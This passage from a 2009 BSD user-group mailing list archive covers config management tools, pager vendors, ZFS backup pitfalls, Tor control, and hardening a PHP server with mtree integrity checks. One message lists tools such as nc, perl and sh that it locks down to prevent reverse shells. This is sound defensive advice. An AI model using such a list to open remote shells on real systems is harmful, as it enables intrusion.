URL of a canonical version) and the location on the >> file system to write the rendered template to once the substitutions >> have been performed. It optionally includes a file mode, owner, >> group, and the location of a symlink to make to the file location. >> >> There's some additional detail in structuring the central config >> server and doing some other stuff that makes it simpler to manage, but >> that's the gist of it. 
It's about two hundred lines of python, it >> supports doing diffs between the central configuration and the local >> reality for any attribute it understands (so file contents, owner, >> group, mode, etc.) as well as a programmatic mode intended to be run >> from cron that'll tell you whether anything has changed on the machine >> so you can make sure none of your machines have drifted nightly, etc. >> We've started checking the central config tree into SVN so we have an >> audit trail of who did what to what file. >> >> Does it do everything puppet does? God no. Does it do everything >> cfengine does? Again, god no. It's an 80/20 solution, it took me an >> afternoon to write the first version of it, and maybe a week of total >> development time to get it doing what it does and full test coverage >> for it. It happily manages several hundred machines, it makes >> installing and provisioning a new machine a thirty second job instead >> of a half hour or so, and it makes managing software installs over >> multiple machines much, much easier and more deterministic. >> >> Like I said, I've been planning on asking about open sourcing it >> anyway, but if I don't get to do that, I'll be happy to answer >> questions or give pointers where I can. >> >> --Dave > > > This sounds hot- I wanna try it :) Ditto. Specifically, it sounds simple enough to actually sit down and implement, which is what has scared me away from everything else. 
Charles > Rocket- > .ike > > > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > From pete at nomadlogic.org Sun Mar 8 13:08:09 2009 From: pete at nomadlogic.org (Pete Wright) Date: Sun, 8 Mar 2009 10:08:09 -0700 Subject: [nycbug-talk] version control for config files In-Reply-To: References: <5b5090780903072136m2e5a63ddl2281cdd7ddffaec2@mail.gmail.com> <4680D7E1-B216-4844-84FF-A513094B0C6F@donnerjack.com> <861DB338-3985-43A5-9A06-54333D245410@lesmuug.org> Message-ID: <96B01A98-E22F-4121-9BA0-F0C5D6B62B5C@nomadlogic.org> On 7-Mar-09, at 10:32 PM, Charles Sprickman wrote: > On Sun, 8 Mar 2009, Isaac Levy wrote: > >> On Mar 8, 2009, at 12:59 AM, David Lawson wrote: >> >>> Puppet is a really good option for config management, I looked >>> really >>> seriously at it a while back and liked what I saw a lot, but I had >>> two >>> major problems with it. First, it's written in Ruby and I'm not a >>> Ruby programmer, so that kind of bites if I wanted to extend it. >>> Second, and nearly every configuration management system I've looked >>> at suffers from this problem, there's a pretty serious bootstrap >>> cost >>> to implementing it. It's a reasonably complex system, it's non- >>> trivial to understand how to make it do what you want it to do, and >>> when you do get a good handle on it, converting all your systems to >>> use it can be a pretty serious undertaking, depending on how many >>> you >>> have. At the time, I was looking at a couple hundred, with >>> configurations drifted all over hell and gone, so that was a time >>> sink >>> I couldn't afford. >>> >>> What I ended up doing is writing a stupid simple configuration >>> manager >>> in python, we call it ghetto-config in the office. 
>>> I've actually been thinking about asking to open source it, I'll talk
>>> to my boss about it on Monday, but the basic concepts are simple, and
>>> it didn't take me more than an afternoon to implement a first cut.
>>>
>>> Ghetto-config works as a very simple templating engine, you define a
>>> bunch of key-value pairs, and you can use those keys in a file
>>> and have ghetto-config substitute in the appropriate value for you
>>> when it parses it. It also understands how to set file modes, create
>>> symlinks, manage owners and groups, and how to diff versions of a file
>>> if it's changed.
>>>
>>> Basically, you assign each machine a unique ID of some sort at install
>>> time (or later, if you want), we used the MAC address of the interface
>>> that was used to PXE boot the machine for kickstart, but you could use
>>> hostname or whatever if that was easier. That serves as the unique
>>> identifier for the system. Ghetto-config takes that information and
>>> uses it to build a URL to fetch configuration information from a
>>> central HTTP server storing config data. It fetches the URL it builds
>>> and gets back a file in config parser syntax (basically an .ini file)
>>> with a couple special sections. The first section is includes, so it
>>> can include other config parser syntax files. The second is
>>> definitions, it allows you to set up key-value pairs, like $eth0-ip$ =
>>> 192.168.1.15, and the third is the set of managed file sections.
>>>
>>> Each managed file section gives the URL to fetch the template from (so
>>> you can use the same template file for multiple machines by just
>>> pointing to the URL of a canonical version) and the location on the
>>> file system to write the rendered template to once the substitutions
>>> have been performed. It optionally includes a file mode, owner,
>>> group, and the location of a symlink to make to the file location.
>>>
>>> There's some additional detail in structuring the central config
>>> server and doing some other stuff that makes it simpler to manage, but
>>> that's the gist of it. It's about two hundred lines of python, it
>>> supports doing diffs between the central configuration and the local
>>> reality for any attribute it understands (so file contents, owner,
>>> group, mode, etc.) as well as a programmatic mode intended to be run
>>> from cron that'll tell you whether anything has changed on the machine
>>> so you can make sure none of your machines have drifted nightly, etc.
>>> We've started checking the central config tree into SVN so we have an
>>> audit trail of who did what to what file.
>>>
>>> Does it do everything puppet does? God no. Does it do everything
>>> cfengine does? Again, god no. It's an 80/20 solution, it took me an
>>> afternoon to write the first version of it, and maybe a week of total
>>> development time to get it doing what it does and full test coverage
>>> for it. It happily manages several hundred machines, it makes
>>> installing and provisioning a new machine a thirty second job instead
>>> of a half hour or so, and it makes managing software installs over
>>> multiple machines much, much easier and more deterministic.
>>>
>>> Like I said, I've been planning on asking about open sourcing it
>>> anyway, but if I don't get to do that, I'll be happy to answer
>>> questions or give pointers where I can.
>>>
>>> --Dave
>>
>>
>> This sounds hot- I wanna try it :)
>
> Ditto.
>
> Specifically, it sounds simple enough to actually sit down and
> implement, which is what has scared me away from everything else.
>

should check out cobbler if you all are interested in a provisioning
mgt system:

https://fedorahosted.org/cobbler/

yea, it's currently RHEL/Fedora based, but i've used it for a while
now to manage other OS's. it's written in python, and it supports
Cheetah templates inside kickstart/preseed/ files.
it also manages dhcpd and bind configs pretty well and has a webUI.

the developer works for redhat - but he's a super nice guy and really
wants better BSD and non-rhel support for his project.

it integrates with puppet quite well too...

-p

From riegersteve at gmail.com Sun Mar 8 14:45:34 2009
From: riegersteve at gmail.com (riegersteve at gmail.com)
Date: Sun, 8 Mar 2009 18:45:34 +0000
Subject: [nycbug-talk] version control for config files
Message-ID: <22274220-1236537967-cardhu_decombobulator_blackberry.rim.net-1195934676-@bxe1146.bisx.prod.on.blackberry>

Here at Ticketmaster we use an in-house piece that we released as open
source. Called rubix
--
Sent via Blackberry
I can be reached at 310-947-8565

From dave at donnerjack.com Sun Mar 8 16:30:58 2009
From: dave at donnerjack.com (David Lawson)
Date: Sun, 8 Mar 2009 16:30:58 -0400
Subject: [nycbug-talk] version control for config files
In-Reply-To: <96B01A98-E22F-4121-9BA0-F0C5D6B62B5C@nomadlogic.org>
References: <5b5090780903072136m2e5a63ddl2281cdd7ddffaec2@mail.gmail.com> <4680D7E1-B216-4844-84FF-A513094B0C6F@donnerjack.com> <861DB338-3985-43A5-9A06-54333D245410@lesmuug.org> <96B01A98-E22F-4121-9BA0-F0C5D6B62B5C@nomadlogic.org>
Message-ID: <12C65CEE-53CF-4652-BF8A-CB49BD96FDEE@donnerjack.com>

> should check out cobbler if you all are interested in a provisioning
> mgt system:
>
> https://fedorahosted.org/cobbler/
>
> yea, it's currently RHEL/Fedora based, but i've used it for a while
> now to manage other OS's. it's written in python, and it supports
> Cheetah templates inside kickstart/preseed/ files. it also manages
> dhcpd and bind configs pretty well and has a webUI.
>
> the developer works for redhat - but he's a super nice guy and really
> wants better BSD and non-rhel support for his project.
>
> it integrates with puppet quite well too...

We actually use that as well, it replaced our original, simpler
kickstart system.
We haven't seen a lot of value add out of it, honestly, but I have a feeling we aren't leveraging its functionality as well as we should be, the guy who deployed it isn't big on documentation or communication, so it's just kind of there. What kind of additional features beyond basic kickstart are you guys getting from it? --Dave From brian.gupta at gmail.com Sun Mar 8 17:45:34 2009 From: brian.gupta at gmail.com (Brian Gupta) Date: Sun, 8 Mar 2009 16:45:34 -0500 Subject: [nycbug-talk] Pager Vendors? In-Reply-To: <28025CF5-740E-43F9-AB01-691679178E7C@lesmuug.org> References: <28025CF5-740E-43F9-AB01-691679178E7C@lesmuug.org> Message-ID: <5b5090780903081445t6d71d26fy4e164563b49ec642@mail.gmail.com> They also have better battery life, and are more indestructible/reliable in general for emergency services. Gonna put in a +1 for Marc's suggestion of skytel.com -Brian On Wed, Feb 11, 2009 at 10:31 AM, Isaac Levy wrote: > Hi All, > > Does anyone have a good old-school pager service vendor in the city, > or have any tips? > > (For those who forgot, it's the little box with an LCD screen- they > were around before cellphones... It operates on a different, simpler > radio frequency, and the units get far better reception than a > cellphone.) > > Rocket, > .ike > > > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > -- - Brian Gupta New York City user groups calendar: http://nyc.brandorr.com/ From tekronis at gmail.com Sun Mar 8 21:17:48 2009 From: tekronis at gmail.com (H. G.) 
Date: Sun, 8 Mar 2009 21:17:48 -0400
Subject: [nycbug-talk] version control for config files
In-Reply-To: <22274220-1236537967-cardhu_decombobulator_blackberry.rim.net-1195934676-@bxe1146.bisx.prod.on.blackberry>
References: <22274220-1236537967-cardhu_decombobulator_blackberry.rim.net-1195934676-@bxe1146.bisx.prod.on.blackberry>
Message-ID: <60131f920903081817q658d3023s63c61b93b3eab528@mail.gmail.com>

On Sun, Mar 8, 2009 at 2:45 PM, wrote:
> Here at Ticketmaster we use an in-house piece that we released as
> open source. Called rubix

Has it been renamed to "Spine"? ( http://code.google.com/p/spine-mgmt/ ) ?

From matt at atopia.net Mon Mar 9 00:54:26 2009
From: matt at atopia.net (Matt Juszczak)
Date: Mon, 9 Mar 2009 00:54:26 -0400 (EDT)
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com>
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com>
Message-ID:

> Yes, /tmp is the favorite directory of all www script kiddies and other
> crackers. Mounting it noexec can help a little bit, but I also disable
> world x rights for perl, ssh, nc, sh, c, as, etc., so they won't be able
> to open a remote reverse shell. I really think that php websites
> nowadays are number one on the crackers' list.

Is there a document with a list of steps that could potentially help this?
Also, is there a possible default mtree file I could use for 6.3-RELEASE
since I didn't generate one in the beginning? What's the best way to
audit an *existing* server with PHP running on it, etc.? We've got some
wordpress installs, etc. - unsure if any were vulnerable.

-M

From akosela at andykosela.com Mon Mar 9 07:21:13 2009
From: akosela at andykosela.com (Andy Kosela)
Date: Mon, 09 Mar 2009 12:21:13 +0100
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To:
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com>
Message-ID: <49b4fba9.Jl2L6Zv35eHa839q%akosela@andykosela.com>

Matt Juszczak wrote:
> > Yes, /tmp is the favorite directory of all www script kiddies and other
> > crackers. Mounting it noexec can help a little bit, but I also disable
> > world x rights for perl, ssh, nc, sh, c, as, etc., so they won't be able
> > to open a remote reverse shell. I really think that php websites
> > nowadays are number one on the crackers' list.
>
> Is there a document with a list of steps that could potentially help this?
> Also, is there a possible default mtree file I could use for 6.3-RELEASE
> since I didn't generate one in the beginning? What's the best way to
> audit an *existing* server with PHP running on it, etc. We've got some
> wordpress installs, etc. - unsure if any were vulnerable.

The only document you need is 'man mtree'. There is no default mtree
specification file generated with at least sha256digest, and that's what
you need. You also need to make sure to exclude (-X filename) any
directories with dynamically generated files. For the overall security
of the site installing some type of WAF could help, like mod-security2.

# mtree -c -K sha256digest -X mtree.exclude -p /path > host.mtree

# mtree -X mtree.exclude -p /path < host.mtree

That's only two commands you need to know. Of course you can script it
to send you alerts via email etc.

--Andy

From matt at atopia.net Mon Mar 9 13:10:58 2009
From: matt at atopia.net (Matt Juszczak)
Date: Mon, 9 Mar 2009 13:10:58 -0400 (EDT)
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <49b4fba9.Jl2L6Zv35eHa839q%akosela@andykosela.com>
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49b4fba9.Jl2L6Zv35eHa839q%akosela@andykosela.com>
Message-ID:

> The only document you need is 'man mtree'.
> There is no default mtree
> specification file generated with at least sha256digest, and that's what
> you need. You also need to make sure to exclude (-X filename) any
> directories with dynamically generated files. For the overall security
> of the site installing some type of WAF could help, like mod-security2.
>
> # mtree -c -K sha256digest -X mtree.exclude -p /path > host.mtree
>
> # mtree -X mtree.exclude -p /path < host.mtree
>
> That's only two commands you need to know. Of course you can script it
> to send you alerts via email etc.
>
> --Andy

Andy,

Understood, but if I'm trying to compare files that came with the default
FreeBSD 6.3-RELEASE installation (to protect from rootkits), wouldn't
running a command on ANY 6.3-RELEASE install that I know to be correct
work?

From akosela at andykosela.com Mon Mar 9 19:48:00 2009
From: akosela at andykosela.com (Andy Kosela)
Date: Tue, 10 Mar 2009 00:48:00 +0100
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To:
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49b4fba9.Jl2L6Zv35eHa839q%akosela@andykosela.com>
Message-ID: <49b5aab0.JrVJRC3wkvKL+jcc%akosela@andykosela.com>

Matt Juszczak wrote:
> > The only document you need is 'man mtree'. There is no default mtree
> > specification file generated with at least sha256digest, and that's what
> > you need. You also need to make sure to exclude (-X filename) any
> > directories with dynamically generated files. For the overall security
> > of the site installing some type of WAF could help, like mod-security2.
> >
> > # mtree -c -K sha256digest -X mtree.exclude -p /path > host.mtree
> >
> > # mtree -X mtree.exclude -p /path < host.mtree
> >
> > That's only two commands you need to know. Of course you can script it
> > to send you alerts via email etc.
> >
> > --Andy
>
> Andy,
>
> Understood, but if I'm trying to compare files that came with the default
> FreeBSD 6.3-RELEASE installation (to protect from rootkits), wouldn't
> running a command on ANY 6.3-RELEASE install that I know to be correct
> work?

Not really. mtree(8) by default takes into account mtime, so if you
rebuilt the system at any given time, you need to start from scratch
with the new fresh specification file.

That's an example of an mtree(8) specification:

COPYRIGHT mode=0444 size=6192 time=1233677486.0 \
    sha256digest=a51a4407a4a7e188639fc2f066c2fdc898fbcde239b03395dafa4ebc5eea54b2

--Andy

From matt at atopia.net Mon Mar 9 19:53:20 2009
From: matt at atopia.net (Matt Juszczak)
Date: Mon, 9 Mar 2009 19:53:20 -0400 (EDT)
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <49b5aab0.JrVJRC3wkvKL+jcc%akosela@andykosela.com>
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49b4fba9.Jl2L6Zv35eHa839q%akosela@andykosela.com> <49b5aab0.JrVJRC3wkvKL+jcc%akosela@andykosela.com>
Message-ID:

> Not really. mtree(8) by default takes into account mtime, so if you
> rebuilt the system at any given time, you need to start from scratch
> with the new fresh specification file.

OK. Surely there's a way to check out a system where this procedure
wasn't performed. I guess, potentially, using chkrootkit comparing
sources compiled in /usr/src?

-M

From spork at bway.net Mon Mar 9 22:15:24 2009
From: spork at bway.net (Charles Sprickman)
Date: Mon, 9 Mar 2009 22:15:24 -0400 (EDT)
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To:
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com>
Message-ID:

On Mon, 9 Mar 2009, Andy Kosela wrote:

>> Yes, /tmp is the favorite directory of all www script kiddies and other
>> crackers.
>> Mounting it noexec can help a little bit, but I also disable
>> world x rights for perl, ssh, nc, sh, c, as, etc., so they won't be able
>> to open a remote reverse shell. I really think that php websites
>> nowadays are number one on the crackers' list.

I'm coming into this late and addressing the /tmp issue. This is a
very, very simple tip that comes as a result of some type of OCD issue I
have with /tmp.

At some point in the last few years I noticed that /tmp becomes a total
trash heap as you install more and more junk on a server. However, I
also noticed that a good deal of software that needs a "tmp" directory
of some sort allows you to explicitly specify a path. So my current
procedure is this:

- if a piece of software allows you to specify a path to "/tmp", specify
  it, but create a subdirectory in /tmp for it and chown it to the user
  the app will be running as

Simple, but using the example of php, you can set a path for the php
session info, the upload dir, etc. (upload_tmp_dir, session.save_path,
eaccelerator.cache_dir). So if you start thinking something sneaky is
going on with php, you are looking at not all of /tmp for crap, but you
can zoom right into the problem area...

Just a handy tip...
Charles > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > From ike at lesmuug.org Tue Mar 10 12:28:48 2009 From: ike at lesmuug.org (Isaac Levy) Date: Tue, 10 Mar 2009 12:28:48 -0400 Subject: [nycbug-talk] Remote backup services In-Reply-To: <5D0DAC0B-5A1C-46B7-9264-B7028FF2369C@exit2shell.com> References: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry> <5D0DAC0B-5A1C-46B7-9264-B7028FF2369C@exit2shell.com> Message-ID: On Mar 4, 2009, at 9:05 AM, Steven Kreuzer wrote: > > On Mar 3, 2009, at 6:43 PM, Raj Goel wrote: > >> Guys, >> >> Has anyone figured out how to implement Mozy or Carbonite like >> backup services using FOSS tools? >> >> How would you backup linux, bsd, mac clients? Windows? >> >> Like the idea of wan-based backups, dislike trusting vendors that >> may cease to exist. > > Thats a pretty open ended question. > > How much infrastructure are you willing to put behind this? > How reliable do you need it to be? > How much money are you willing to spend? > How many clients are you backing up? > How much storage space do you need? > > -- > Steven Kreuzer > http://www.exit2shell.com/~skreuzer Indeed- without knowing your reqs, this is really open-ended... -- However, for offsite cumulative backups, this is certainly novel: ZFS Snapshots to Amazon S3: http://blogs.sun.com/ec2/entry/zfs_snapshots_to_and_from Depending on your requirements, instead of actually mounting the snapshots remotely, (as in the article), one could script pgp/gpg encryption and just dump the snapshot files- pay as you go historical snapshots... This ZFS snapshot method doesn't just apply to S3, of course one could script them to shuffle off elsewhere... (Do the pricing with S3 and compare actual use pricing... If you'll retrieve the data often, the S3 scenario could become quite costly...) 
Rocket-
.ike

From carton at Ivy.NET Tue Mar 10 14:28:25 2009
From: carton at Ivy.NET (Miles Nordin)
Date: Tue, 10 Mar 2009 14:28:25 -0400
Subject: [nycbug-talk] Remote backup services
In-Reply-To: <73FCF000-4C12-4051-BE3A-AE7FCFCABFED@lesmuug.org> (Isaac Levy's message of "Tue, 10 Mar 2009 12:32:46 -0400")
References: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry> <5D0DAC0B-5A1C-46B7-9264-B7028FF2369C@exit2shell.com> <73FCF000-4C12-4051-BE3A-AE7FCFCABFED@lesmuug.org>
Message-ID:

>>>>> "il" == Isaac Levy writes:

    il> ZFS Snapshots to Amazon S3:
    il> http://blogs.sun.com/ec2/entry/zfs_snapshots_to_and_from

Aside from the problem that S3 is ludicrously expensive... you should
not be storing 'zfs send' streams, ever. You may transport them but
not archive them. The problems:

 * they're atomic. If one bit in a stream is flipped, the whole stream
   is bad.

 * they're atomic. You must restore an entire stream or no stream---if
   you don't have enough space for a stream you can't even see what's
   inside it.

 * the incremental feature is rigid. If one bit is flipped in the
   backing-store to which the incremental is meant to apply, then it
   won't restore.

 * the upward/downward compatibility across ZFS versions is bad and
   haphazard. You can only count on it working for the exact same
   release that wrote the stream, though sometimes it's better. They
   are trying to make a stronger compatibility commitment, but they do
   not seem in control of the current situation so I am not prepared to
   buy whatever commitment they make, especially for something
   archival.

 * bugs. kernel panics on recv, endianness bugs.

 * there is no way to test the stream's validity without enough space
   to restore it. This is important period, but it's more subtle.
There never will be such a way, because the kernel is involved in
restoring streams, and one of the ways that streams can be invalid is
that they panic the kernel upon recv which is not a legitimate way,
it's an unfixed bug, so it could come and go arbitrarily, and nothing
but an exact replication of the recv process is a good way to test for
it since we do not know where the bug is yet. This bug is bad but FAR
more workable if you're using send|recv to move data rather than
archive it.

I continually get into arguments with people on the mailing list about
this, and to my view I win every single one of them decisively and the
original suggesters leave ``educated'' not indignant, but someone pops
up later with the same bad idea. And the Sun people will not update
the si wiki with other than an ambiguous CYA warning ``zfs send is not
an enterprise backup solution,'' and I wrote the wiki guy myself asking
for an account and was ignored so I guess the si wiki is a Sun
mouthpiece like their employee blogs, just hiding under another domain
name.

Partly I think it keeps coming up because it's an obvious idea that's
very subtle in its badness. And partly Sun is promoting this bad
practice through their viral marketing behemoth to the effect of making
ZFS seem more versatile.

Storing them in S3 probably has fewer of the problems of storing them
on disk or tape, but it's still not great. The blogger is suggesting
something subtly different, using S3 to ``move'' filesystems between
instances (safe) or across short stretches of time (less safe,
depends). Storing them in S3 for the purposes of booting a system
might be a relatively good idea, because in that case you will have a
filesystem-level backup somewhere else (filesystem-level means your
backup must NOT be a duplicate copy of the same S3 stream. it must be
a copy in cpio/tar/zpool/ext3 form.). He's just talking about non-boot
data filesystems but...
I don't think it's easy to arrange to boot a solaris VM from a ZFS-root stored in 'send' format. It'd be interesting to explore. You could recv one bulk stream on all nodes, then recv a different incremental stream on each subnode to customize it, thus saving S3 dollars. I think Solaris do have an early userspace like Linux, so maybe something could be adapted to boot from a zfs send stream. This application is not the same as backup, though. It's a form of replication, which is what zfs send | zfs recv's fragileness is good for. It's replication because if the stream goes sour somehow, you can presumably regenerate it from the real authoritative master node somewhere outside Amazon. What you care about most is, when you bring up your tens of EC2 instances and 'zfs recv' their roots, you want them to really definitely have exactly the root disk you think they should. If they don't, you can chuck the broken S3 stream and make a new one. It would be tempting to save S3 dollars by tossing in 'zfs send' incremental snapshots of the VM as the VM is running, instead of stopping the VM and copying the whole virtual disk. You could afford in S3 $ and performance to do it frequently, even like, every five minutes. And zfs will let you coalesce these snapshots, so every hour you could send a rollup and drop the tiny ones. You could do test-sends to 'wc' and only pay for an S3 dump after the 'zfs send' stream gets kind-of big. This would be kind of borderline safety depending on whether the VM's are storing something of high value (unsafe), or is it just logs and mailqueues full of spam backscatter (slap!)---like, you are using zfs send/S3 as you'd use a fragile unredundant working disk, and your real backup is elsewhere like on a nightly zfs send -> zpool outside Amazon. You can work through my objections below and see if you think it's safe or not. anyway 'zfs send' is for replicating one ZFS pool into another, not for backing it up. 
If you want to backup, you should use gtar/pax/cpio/rsync/..., or else zfs recv into a backup pool. If you have enough scratch space, you can write file-backed vdev's to tape, or make several dvd/bd-size file vdevs. archiving the ZFS pools themselves is obviously okay since otherwise ZFS would suck, but you can see my specific cases below. but I think S3 is too expensive to use for anything. We need self-organizing S3 on livecd, then we just rent hardware on the open market. -----8<----- From: Miles Nordin Subject: Re: [zfs-discuss] GSoC 09 zfs ideas? To: zfs-discuss at opensolaris.org Date: Mon, 02 Mar 2009 18:37:43 -0500 References: <49A511CF.1050107 at netsyncro.com> <38171ac60902260843l2e7a595cr53187ccbc924aa00 at mail.gmail.com> <49A8760C.5040500 at netsyncro.com> <47B26F54-E30A-454E-B6B5-FB18268221CA at ee.ryerson.ca> <49A88D37.10408 at gmail.com> <4786252C-55A5-4EFD-8976-955B93039A66 at ee.ryerson.ca> In-Reply-To: <4786252C-55A5-4EFD-8976-955B93039A66 at ee.ryerson.ca> (David Magda's message of "Fri, 27 Feb 2009 22:24:31 -0500") Message-ID: >>>>> "dm" == David Magda writes: dm> Yes, in its current state; hopefully that will change some dm> point in the future I don't think it will or should. A replication tool and a backup tool seem similar, but they're not similar enough. With replication, you want an exact copy, and if for some reason the copy is not exact then you need something more: you want atomicity of operations so the overwatcher scheduler: * can safely retry the send|recv until it works, * can always tell its minder with certainty how much has safely been replicated so far, * can attempt further replication without risking existing data. These things are a bit hard to achieve. 
And zfs send|recv does them:

 * If a single bit is flipped the whole stream should be discarded

 * If, on a 'send' timeline of , , , , one of the preceding blobs did
   not make it, or became bad on the replication target (because
   somebody wrote to it, for example---a FAQ), it should become
   impossible to restore further incremental backups. The error should
   not be best-effort worked around, or simply silently concealed, the
   way it is and should be with restoring incremental backups.

 * reslicing the unit of replication after writing the stream is
   irrelevant, because you can just reslice on the replication-source
   if you need to do this. The possibility of reslicing interferes
   with the atomicity I spoke of which makes the replication scheduler
   so much easier to get correct.

 * there's no need to test a stream's validity without restoring it.
   The replication target will always be available and have enough
   free space to test-by-receiving.

 * there's no need to restore the stream on an unimagined future
   filesystem. It's more important that all fancyfeatures, ACL's,
   gizmos, properties, compression modes, record sizes, whatever, make
   it to the replication target exactly to avoid surprises. No one is
   worried about data being locked in to a certain filesystem because
   it's all there for you to get with rsync on both replication source
   and target.

Try to use such a tool for backup, and you court disaster. Your pile
of backups becomes an increasingly large time-lapse gamma ray detector,
which signals a ray's presence by destroying ALL the data not just the
bit, not even just the file, that the ray hit. The impossibility of
reslicing (extracting a single file from the backup) means that you can
find yourself needing 48TB of empty disk on a development system
somewhere to get out a 100kB file locked inside the atomic blob, which
is an unacceptable burden in time and expense.
The other points have obvious problems for backups, too---I'll leave
inventing imaginary restore scenarios as an exercise for the reader.

All these harmful points are things that replication wants/needs. The
goals are incompatible. If there's going to be a snapshot-aware
incremental backup tool for ZFS, I do not think zfs send|recv is a good
starting point. And I'm getting frustrated pointing out these issues
for the 10th time---it seems like, I mention five relatively unsolvable
problems, and people seize onto the easiest one, misinterpret it, and
then forget the other four.

the versioning issue (NOT mentioned above) is a problem for replication
among different Solaris releases, not just backup. It means you could
potentially have to upgrade a whole mess of machines at once. At the
very least you ought to be able to upgrade the target before you
upgrade the source, so you don't have to break replication while doing
the upgrade---coincidentally that's the right direction for
upgrade-test-downgrade, too, since it's on the target that you'd
possibly have to destroy the zpools if you decide you need to
downgrade. We should want this and don't have it yet. It makes having
a single backup pool for a lab full of different-aged systems
impossible (even with backward-only compatibility, how do you
restore?), so it is worth solving for that use case too.

I think the 'zfs send' format of a given filesystem should be
bit-for-bit identical given a certain ZFS version, irrespective of
zpool version or kernel release on the sending system. That's enough
to solve the single-lab-backup-pool problem, and it's also
regression-testable---keep some old streams around, recv them into the
pool under test, send them back out, and make sure they come out
identical. And the 'zfs recv' panics need fixing.

those would both be great things, but they would *NOT* make zfs
send|recv into a backup system! They would make it into a better
replication system.
zfs send|recv will not become backup tools if you manage to check off a few other list-of-things-to-fix, either. They can't be both a good replication system and a good backup system at the same time.

no, I don't think the si wiki explains the full size of the issue adequately. It makes it sound like the tools are just a little too small, and maybe someday they will get bigger, maybe some people should just ignore the advice and use them anyway. It's CYA bullshit.

i think in the meantime you should make backups with cpio (or some tool that uses something similar underneath like Amanda) or by archiving file-vdev zpools. not perfect but better. And you should store it on the medium in some way that the whole thing won't be wiped by one flipped bit (not gzip).

From matt at atopia.net Tue Mar 10 18:35:08 2009
From: matt at atopia.net (Matt Juszczak)
Date: Tue, 10 Mar 2009 18:35:08 -0400 (EDT)
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To:
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com>
Message-ID:

> Just a handy tip...

Good pieces of advice. At this point, I'm implementing mtree for my new server deployments, but I still wish there was a way to somehow check if my FreeBSD 6.3-RELEASE machine has been compromised.

From techneck at goldenpath.org Tue Mar 10 18:56:31 2009
From: techneck at goldenpath.org (Tim A.)
Date: Tue, 10 Mar 2009 18:56:31 -0400
Subject: [nycbug-talk] Remote backup services
In-Reply-To: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry>
References: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry>
Message-ID: <49B6F01F.8060900@goldenpath.org>

Raj Goel wrote:
> Guys,
>
> Has anyone figured out how to implement Mozy or Carbonite like backup services using FOSS tools?
>
> How would you backup linux, bsd, mac clients? Windows?
>
> Like the idea of wan-based backups, dislike trusting vendors that may cease to exist.
>

Sort of glossy ain't they?

What's wrong with a good ol' snapshot / rsync? Fairly portable too. But the snapshot business is very FS / OS dependent. Lots of FOSS rsync guis out there too. But none I've seen automagically work out of snapshots. Have to do that manually. Probably no one wants to tackle incorporating that into a general purpose tool cause, like I said, too many FS / OS variables in the multi-platform theater.

Another important thing to consider is the remote storage equation. What level of service / reliability are you gunning for?

I always thought rsync.net was a good idea. Their Windows Backup Agent even does the snapshot for ya. Never could wrap my head around paying that much for remote storage though. (even if your name is rsync.net) Compare their redundant site storage vs rsyncing across 3 el cheapo generic hosting accounts (with tons of cheap storage). $2.10/month vs $0.09/month. Maybe I'm just a cheap bastard, but I don't like throwing money away, even if it is other people's.

From techneck at goldenpath.org Tue Mar 10 19:22:06 2009
From: techneck at goldenpath.org (Tim A.)
Date: Tue, 10 Mar 2009 19:22:06 -0400
Subject: [nycbug-talk] Remote Tor Controller app, besides telnet?
Message-ID: <49B6F61E.10001@goldenpath.org>

Playing around with Tor, ya know how circuit quality's like the luck of the draw, and if you're using Vidalia you just click "New Identity" or whatever for some "clean" / new circuits.

But, using a transparent proxy, you need to remotely send signals to the controller port. Vidalia is less than ideal for this, although it does have a config field for controller address and port. It's buggy, crappy and obviously assumes tor is running locally. (Required field is path to tor binary).

k, so http://www.torproject.org/svn/trunk/doc/spec/control-spec.txt

And you can control tor using telnet and the control-spec. Except, passing cookies or hashes via telnet is a pita, so ya gotta just leave it no auth, 127 bound and tunnel to it.

I'm scratchin my head, like, dude where's the torctl utility, duh?

From mspitzer at gmail.com Tue Mar 10 23:51:09 2009
From: mspitzer at gmail.com (Marc Spitzer)
Date: Tue, 10 Mar 2009 23:51:09 -0400
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To:
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com>
Message-ID: <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com>

On Tue, Mar 10, 2009 at 6:35 PM, Matt Juszczak wrote:
>> Just a handy tip...
>
> Good pieces of advice. At this point, I'm implementing mtree for my new
> server deployments, but I still wish there was a way to somehow check if
> my FreeBSD 6.3-RELEASE machine has been compromised.

